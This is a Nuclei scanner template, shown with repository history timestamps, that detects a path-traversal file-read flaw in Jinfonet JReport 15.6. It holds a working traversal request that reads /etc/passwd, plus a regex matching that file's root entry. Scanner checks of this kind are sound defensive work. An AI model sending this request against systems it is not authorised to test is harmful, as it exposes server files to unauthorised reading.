nuclei-templates/http/vulnerabilities/other/jinfornet-jreport-lfi.yaml

34 lines
1.0 KiB
YAML
Raw Normal View History

2022-01-03 00:27:54 +00:00
id: jinfornet-jreport-lfi
info:
name: Jinfornet Jreport 15.6 - Local File Inclusion
2022-01-03 00:27:54 +00:00
author: 0x_Akoko
severity: high
description: Jinfornet Jreport 15.6 is vulnerable to local file incluion via the Jreport Help function in the SendFileServlet. Exploitaiton allows remote unauthenticated users to view any files on the Operating System with Application services user permission. This vulnerability affects Windows and Unix operating systems.
reference:
- https://cxsecurity.com/issue/WLB-2020030151
- https://www.jinfonet.com/product/download-jreport/
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
2022-01-03 00:27:54 +00:00
tags: jreport,jinfornet,lfi
http:
2022-01-03 00:27:54 +00:00
- method: GET
path:
- "{{BaseURL}}/jreport/sendfile/help/../../../../../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
part: body
2022-01-03 00:27:54 +00:00
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200
# Enhanced by mp on 2022/08/03